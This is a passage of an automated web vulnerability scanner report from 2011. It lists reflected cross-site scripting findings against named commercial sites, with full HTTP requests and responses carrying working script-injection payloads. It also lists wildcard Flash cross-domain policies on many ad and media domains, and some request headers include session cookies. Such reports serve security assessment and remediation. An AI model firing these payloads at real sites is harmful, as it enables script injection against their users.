GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\'%3balert(1)//0c2af714aa4&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:23 GMT
Server: Apache
SVRNAME: web2x07
Vary: Accept-Encoding
Content-Length: 5721
Content-Type: text/html


if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
<A HREF="http://wowweb.weather.com?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\\';alert(1)//0c2af714aa4&par=WOWsnull_null&site=null&cm_ven=WOWsnull&cm_cat=null&code=brand&promo=logo&cm_ite=brand&cm_pla=logo" style="text-decoration:none;" target="wownewwin">
...[SNIP]...

5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /weather/wow/module/USNY0400

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1b30'%3balert(1)//5bc7f5a3bd7 was submitted in the target parameter. This input was echoed as e1b30';alert(1)//5bc7f5a3bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_modulee1b30'%3balert(1)//5bc7f5a3bd7 HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:09 GMT
Server: Apache
SVRNAME: web2x06
Vary: Accept-Encoding
Content-Length: 5483
Content-Type: text/html


if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
d, moduleHTML)

} else {
    document.getElementById(mydivId).className = "wow_container";
document.getElementById(mydivId).innerHTML = moduleHTML;

}

}
init('wx_modulee1b30';alert(1)//5bc7f5a3bd7','<div style="border:0px 0px 0px 0px;padding:0px 0px 0px 0px;margin: 0px 0px 0px 0px;position:relative; width:238px; height:60px; overflow:hidden;">
...[SNIP]...

5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc38b"><script>alert(1)</script>81999f0f744 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 87894
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87894
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:25:50 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...
<input type="hidden" value="http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744" name="redirectURL"/>
...[SNIP]...

5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

Issue detail

The value of the na_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326a9"><script>alert(1)</script>fa144a76584 was submitted in the na_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /e/a-677/s-2140.xgi?na_random=678669980&na_url=http%3A//www.fingerhut.com/&na_referrer=&na_title=Fingerhut%3A%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=Apply%20for%20Credit%2C%20Low%20Monthly%20Payments%2C%20Apparel%2C%20Electronics%2C%20Bed%2C%20Bath%2C%20Toys%2C%20Video%20Games%2C%20MP3%20Players%2C%20Home%20Furnishings HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=326a9"><script>alert(1)</script>fa144a76584; na_lr=20110515; na_ps=1; na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=326a9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efa144a76584; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:39:13 GMT
Server: lighttpd/1.4.18
Content-Length: 541


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d326a9"><script>alert(1)</script>fa144a76584&phint=__bk_t%3dFingerhut: Apply For Credit Get Low Monthly Payments&phint=__bk_k%3dApply for Credit, Low Monthly Payments, Apparel, Electronics, Bed, Bath, Toys, Video Games, MP3 Players, Home Furnish
...[SNIP]...

5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9420e"-alert(1)-"ad6a30360a0 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x303190.js&size_id=2&account_id=4462&site_id=5032&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=9420e"-alert(1)-"ad6a30360a0; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790; rpb=5671%3D1; put_2081=AG-00000001389358554

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:22:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110261; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3179363.js^2^1305508799^1305508938&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:22:18 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1283

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3179363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9420e"-alert(1)-"ad6a30360a0\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

6. Flash cross-domain policy
There are 86 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://0.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:43 GMT
Expires: Mon, 16 May 2011 01:29:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://6e8d64.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://6e8d64.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 6e8d64.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:32:50 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://ad-emea.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 15 May 2011 21:21:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:19:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.7. http://admeld.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.8. http://ahome.disney.go.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ahome.disney.go.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=10
Date: Mon, 16 May 2011 01:29:22 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:29:15 GMT
Accept-Ranges: bytes
ETag: W/"8027cdaa6813cc1:10eb"
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=60D33DE2-6672-4C5F-A0C8-19715A096F8C; path=/; expires=Mon, 16-May-2031 01:29:22 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 01:29:25 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 453
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="dolimg.com" />
<allow-access-from domain="a.dolimg.com" />
<allow-access-from domain="home.disney.go.com" />
<allow-access-from domain="disney.go.com" />
<allow-access-from domain="hb.disney.go.com" />
...[SNIP]...

6.9. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 85448

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.10. http://aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:fe8"
Server: Microsoft-IIS/6.0
X-Server: D2G.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 16 May 2011 01:22:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:22:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.11. http://api.ak.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ak.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
X-FB-Server: 10.36.9.114
X-Cnection: close
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 01:25:14 GMT
Date: Mon, 16 May 2011 01:25:14 GMT
Content-Length: 280
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 21:31:00 GMT
Date: Sun, 15 May 2011 21:31:00 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.13. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 16 May 2011 01:19:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.14. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6050
Date: Mon, 16 May 2011 01:30:23 GMT
Connection: close

<?xml version="1.0"?>
